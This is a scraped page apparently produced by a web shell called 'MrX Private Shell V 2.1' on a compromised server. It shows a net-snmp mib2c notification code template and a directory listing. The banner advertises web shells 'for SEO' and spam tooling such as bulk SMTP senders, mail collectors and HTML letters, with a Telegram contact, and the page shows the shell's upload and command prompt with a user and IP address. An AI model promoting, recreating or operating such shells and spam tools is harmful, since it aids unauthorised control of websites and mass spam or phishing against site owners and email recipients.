__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

kentishfootball@216.73.216.211: ~ $
## -*- c -*-
######################################################################
## Do the .h file
######################################################################
@open ${name}.h@
/*
 * Note: this file originally auto-generated by mib2c using
 *        $Id$
 */
#ifndef $name.uc_H
#define $name.uc_H

/* function declarations */
@foreach $i notifications@
int send_${i}_trap(void);
@end@

#endif /* $name.uc_H */
######################################################################
## Do the .c file
######################################################################
@open ${name}.c@
/*
 * Note: this file originally auto-generated by mib2c using
 *        $Id$
 */

#include <net-snmp/net-snmp-config.h>
#include <net-snmp/net-snmp-includes.h>
#include <net-snmp/agent/net-snmp-agent-includes.h>
#include "${name}.h"

extern const oid snmptrap_oid[];
extern const size_t snmptrap_oid_len;

@foreach $i notifications@
int
send_${i}_trap( void )
{
    netsnmp_variable_list  *var_list = NULL;
    const oid ${i}_oid[] = { $i.commaoid };
    @foreach $v varbinds@
    @if $v.isscalar@
    const oid ${v}_oid[] = { $v.commaoid, 0 };
    @end@
    @if !$v.isscalar@
    const oid ${v}_oid[] = { $v.commaoid, /* insert index here */ };
    @end@
    @end@

    /*
     * Set the snmpTrapOid.0 value
     */
    snmp_varlist_add_variable(&var_list,
        snmptrap_oid, snmptrap_oid_len,
        ASN_OBJECT_ID,
        ${i}_oid, sizeof(${i}_oid));
    
    @if count_varbinds($i) > 0@
    /*
     * Add any objects from the trap definition
     */
    @end@
    @foreach $v varbinds@
    snmp_varlist_add_variable(&var_list,
        ${v}_oid, OID_LENGTH(${v}_oid),
        $v.type,
        /* Set an appropriate value for $v */
        NULL, 0);
    @end@

    /*
     * Add any extra (optional) objects here
     */

    /*
     * Send the trap to the list of configured destinations
     *  and clean up
     */
    send_v2trap( var_list );
    snmp_free_varbind( var_list );

    return SNMP_ERR_NOERROR;
}
@end@

Filemanager

Name Type Size Permission Actions
mib2c-data Folder 0755
mibs Folder 0755
snmpconf-data Folder 0755
mib2c.access_functions.conf File 6.38 KB 0644
mib2c.array-user.conf File 36.82 KB 0644
mib2c.check_values.conf File 4.54 KB 0644
mib2c.check_values_local.conf File 2.33 KB 0644
mib2c.column_defines.conf File 330 B 0644
mib2c.column_enums.conf File 602 B 0644
mib2c.column_storage.conf File 728 B 0644
mib2c.conf File 11.66 KB 0644
mib2c.container.conf File 27.54 KB 0644
mib2c.create-dataset.conf File 3.39 KB 0644
mib2c.emulation.conf File 7.92 KB 0644
mib2c.genhtml.conf File 8.3 KB 0644
mib2c.int_watch.conf File 3.02 KB 0644
mib2c.iterate.conf File 21.82 KB 0644
mib2c.iterate_access.conf File 14.74 KB 0644
mib2c.mfd.conf File 948 B 0644
mib2c.notify.conf File 1.98 KB 0644
mib2c.old-api.conf File 8.97 KB 0644
mib2c.perl.conf File 8.57 KB 0644
mib2c.raw-table.conf File 19.05 KB 0644
mib2c.row.conf File 6.87 KB 0644
mib2c.scalar.conf File 4.35 KB 0644
mib2c.table_data.conf File 22.37 KB 0644
snmp_perl.pl File 145 B 0644
snmp_perl_trapd.pl File 431 B 0644
Filemanager